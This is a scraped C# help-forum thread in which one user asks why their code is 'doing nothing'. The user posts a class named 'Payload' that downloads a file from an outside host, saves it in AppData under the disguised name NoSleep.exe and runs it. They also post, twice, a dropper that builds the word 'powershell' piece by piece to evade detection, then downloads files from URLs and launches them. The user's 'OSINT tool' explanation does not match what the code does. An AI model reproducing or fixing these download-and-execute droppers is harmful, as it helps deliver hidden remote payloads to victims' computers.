Wallace And Gromit
Wallace And Gromit
CC#
Created by Wallace And Gromit on 4/10/2023 in #help
✅ doing nothing
29 replies
CC#
Created by Wallace And Gromit on 4/10/2023 in #help
✅ doing nothing
see
29 replies
CC#
Created by Wallace And Gromit on 4/10/2023 in #help
✅ doing nothing
.py
29 replies
CC#
Created by Wallace And Gromit on 4/10/2023 in #help
✅ doing nothing
using System; using System.Net; public class Payload { public static void Main(string[] args) { using (var client = new WebClient()) { client.DownloadFile("https://osintframework.peanutgamerdot.repl.co/OSINTego.py", Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\NoSleep.exe"); } System.Diagnostics.Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\NoSleep.exe"); } }
29 replies
CC#
Created by Wallace And Gromit on 4/10/2023 in #help
✅ doing nothing
OSINT tool usually used for crime investigators, ethical hackers, investigators and other stuff
29 replies
CC#
Created by Wallace And Gromit on 4/10/2023 in #help
✅ doing nothing
maltego is an OSINT tool
29 replies
CC#
Created by Wallace And Gromit on 4/10/2023 in #help
✅ doing nothing
its in python, not c# but im making a c# code for it so i can convert the python file to exe, since pyinstaller (py to exe converter) is too difficult to convert, and i dont know much c#
29 replies
CC#
Created by Wallace And Gromit on 4/10/2023 in #help
✅ doing nothing
its not finished yet though
29 replies
CC#
Created by Wallace And Gromit on 4/10/2023 in #help
✅ doing nothing
maltego/paterva but 10x better
29 replies
CC#
Created by Wallace And Gromit on 4/10/2023 in #help
✅ doing nothing
OSINTego
29 replies
CC#
Created by Wallace And Gromit on 4/10/2023 in #help
✅ doing nothing
the code literally isn't downloading from any websites or executing (i added valid urls)
c#
using System;
using System.Diagnostics;
using System.Threading;

class Program {
static void Main(string[] args) {
string cmdCode = "@echo off\r\n" +
"set files='url1','url2" +
"set myvar=pow\r\n" +
"set myvar=%myvar%er\r\n" +
"set myvar=%myvar%shell\r\n" +
"set myvar=%myvar% \"(%files%)|foreach{$fileName='%TEMP%'+(Split-Path -Path $_ -Leaf);(new-object System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName;}\"\r\n" +
"cmd /c %myvar%";

// Execute the command and capture output
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c \"" + cmdCode + "\"";
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process process = new Process();
process.StartInfo = psi;
process.Start();
string output = process.StandardOutput.ReadToEnd();
process.WaitForExit();

// Wait for a few seconds
Thread.Sleep(5000);

// Print output
Console.WriteLine(output);
}
}
c#
using System;
using System.Diagnostics;
using System.Threading;

class Program {
static void Main(string[] args) {
string cmdCode = "@echo off\r\n" +
"set files='url1','url2" +
"set myvar=pow\r\n" +
"set myvar=%myvar%er\r\n" +
"set myvar=%myvar%shell\r\n" +
"set myvar=%myvar% \"(%files%)|foreach{$fileName='%TEMP%'+(Split-Path -Path $_ -Leaf);(new-object System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName;}\"\r\n" +
"cmd /c %myvar%";

// Execute the command and capture output
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c \"" + cmdCode + "\"";
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process process = new Process();
process.StartInfo = psi;
process.Start();
string output = process.StandardOutput.ReadToEnd();
process.WaitForExit();

// Wait for a few seconds
Thread.Sleep(5000);

// Print output
Console.WriteLine(output);
}
}
29 replies